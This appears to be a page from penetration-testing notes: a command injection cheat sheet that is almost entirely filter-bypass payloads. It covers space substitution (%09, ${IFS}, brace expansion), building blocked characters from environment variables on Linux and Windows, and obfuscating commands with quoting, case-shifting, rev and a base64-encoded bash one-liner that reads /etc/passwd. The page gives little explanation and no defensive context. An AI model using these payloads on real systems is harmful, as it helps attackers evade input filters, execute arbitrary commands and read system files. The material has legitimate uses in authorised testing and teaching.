Command Injection Testing

Parameter

Objective

Identifying Blacklisted Characters

Check in Burp with each Command Injection operators.

Bypassing Space Filters

# Add TAB
%09

# Add SPACE
${IFS}

# Add Brace Expresions
{ls,-al}

Bypassing Other Blacklisted Characters (Linux)

# Add /
${PATH:0:1}

# Add ;
${LS_COLORS:10:1}

# Character Shifting
man ascii (Find \) = 92 
$(tr '!-}' '"-~'<<<[)

Bypassing Other Blacklisted Characters (Windows)

# Add \
%HOMEPATH:~6,-11%
$env:HOMEPATH[0]

Bypassing Blacklisted Commands (Linux)

w'h'o'am'i
w"h"o"am"i
who$@ami
w\ho\am\i
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$(a="WhOaMi";printf %s "${a,,}")
$(rev<<<'imaohw')
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

PreviousWeb Tools NextJWTs and JSON

Last updated 4 months ago